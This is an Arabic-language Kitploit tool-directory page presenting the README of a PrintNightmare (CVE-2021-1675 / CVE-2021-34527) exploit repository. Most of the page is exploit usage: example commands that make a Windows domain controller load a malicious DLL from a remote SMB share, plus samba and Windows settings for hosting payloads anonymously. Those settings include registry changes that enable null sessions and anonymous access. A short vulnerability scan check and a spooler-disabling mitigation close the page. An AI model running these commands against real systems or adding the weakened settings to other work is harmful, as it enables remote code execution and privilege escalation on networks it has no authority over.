Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
PrintNightmare-CVE-2021-1675-CVE-2021-34527 — CVE-2021-1675 / CVE-2021-34527 - PrintNightmare بايثون، سي# وباورشيل تنفيذات الاستغلالات (LPE & RCE) | Kitploit
أدوات/GitHubGitHub/galoget/printnightmare-cve-2021-1675-cve-2021-34527
تصعيد الامتيازاتأطر الاستغلالتحليل الثغرات الأمنيةالاستغلالالحركة الجانبيةاختبار الاختراقأداة الوصول عن بعدتطوير الحمولات

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
GitHub
galoget/printnightmare-cve-2021-1675-cve-2021-34527

PrintNightmare-CVE-2021-1675-CVE-2021-34527

CVE-2021-1675 / CVE-2021-34527 - PrintNightmare بايثون، سي# وباورشيل تنفيذات الاستغلالات (LPE & RCE)

عرض المستودع
5منذ 5 سنواتلم تتم المراجعة بعد

CVE-2021-1675 / CVE-2021-34527

تنفيذ Impacket لمفهوم الإثبات (PoC) لـ PrintNightmare الذي أنشأه في الأصل Zhiniang Peng (@edwardzpeng) و Xuefeng Li (@lxf02942370)

تم اختباره على وحدة تحكم مجال 2019 محدثة بالكامل.

تنفيذ DLLs خبيثة عن بُعد أو محليًا.

تحديث التصحيح

أصدرت Microsoft تصحيحًا للتخفيف من هذه الهجمات، ولكن إذا كانت هذه القيم أدناه موجودة على جهاز، فسيظل الجهاز عرضة للخطر.

root@kitploit:~
REG QUERY "HKLM\Software\Policies\Microsoft\Windows NT\Printers\PointAndPrint"

HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\Printers\PointAndPrint
    RestrictDriverInstallationToAdministrators    REG_DWORD    0x0
    NoWarningNoElevationOnInstall    REG_DWORD    0x1

التثبيت

قبل تشغيل الاستغلال، تحتاج إلى تثبيت نسختي من Impacket وبعد ذلك كل شيء على ما يرام.

root@kitploit:~
pip3 uninstall impacket
git clone https://github.com/cube0x0/impacket
cd impacket
python3 ./setup.py install

CVE-2021-1675.py

root@kitploit:~
usage: CVE-2021-1675.py [-h] [-hashes LMHASH:NTHASH] [-target-ip ip address] [-port [destination port]] target share

CVE-2021-1675 implementation.

positional arguments:
  target                [[domain/]username[:password]@]<targetName or address>
  share                 Path to DLL. Example '\\10.10.10.10\share\evil.dll'

optional arguments:
  -h, --help            show this help message and exit

authentication:
  -hashes LMHASH:NTHASH
                        NTLM hashes, format is LMHASH:NTHASH

connection:
  -target-ip ip address
                        IP Address of the target machine. If omitted it will use whatever was specified as target. This is useful when target is the NetBIOS name
                        and you cannot resolve it
  -port [destination port]
                        Destination port to connect to SMB Server

Example;
./CVE-2021-1675.py hackit.local/domain_user:[email protected] '\\192.168.1.215\smb\addCube.dll'
./CVE-2021-1675.py hackit.local/domain_user:[email protected] 'C:\addCube.dll'

تكوين SMB

أسهل طريقة لاستضافة الحمولات هي استخدام samba وتعديل /etc/samba/smb.conf للسماح بالوصول المجهول.

root@kitploit:~
[global]
    map to guest = Bad User
    server role = standalone server
    usershare allow guests = yes
    idmap config * : backend = tdb
    smb ports = 445

[smb]
    comment = Samba
    path = /tmp/
    guest ok = yes
    read only = no
    browsable = yes
    force user = smbuser

من Windows أيضًا ممكن.

root@kitploit:~
mkdir C:\share
icacls C:\share\ /T /grant Anonymous` logon:r
icacls C:\share\ /T /grant Everyone:r
New-SmbShare -Path C:\share -Name share -ReadAccess 'ANONYMOUS LOGON','Everyone'
REG ADD "HKLM\System\CurrentControlSet\Services\LanManServer\Parameters" /v NullSessionPipes /t REG_MULTI_SZ /d srvsvc /f #This will overwrite existing NullSessionPipes
REG ADD "HKLM\System\CurrentControlSet\Services\LanManServer\Parameters" /v NullSessionShares /t REG_MULTI_SZ /d share /f
REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v EveryoneIncludesAnonymous /t REG_DWORD /d 1 /f
REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v RestrictAnonymous /t REG_DWORD /d 0 /f
# Reboot

المسح

يمكننا استخدام rpcdump.py من Impacket لفحص الأجهزة التي قد تكون عرضة للخطر؛ إذا أعاد قيمة، فقد تكون عرضة.

root@kitploit:~
rpcdump.py @192.168.1.10 | egrep 'MS-RPRN|MS-PAR'

Protocol: [MS-PAR]: Print System Asynchronous Remote Protocol 
Protocol: [MS-RPRN]: Print System Remote Protocol

التخفيف

تعطيل خدمة Spooler.

root@kitploit:~
Stop-Service Spooler
REG ADD  "HKLM\SYSTEM\CurrentControlSet\Services\Spooler"  /v "Start" /t REG_DWORD /d "4" /f
تنزيل الأداة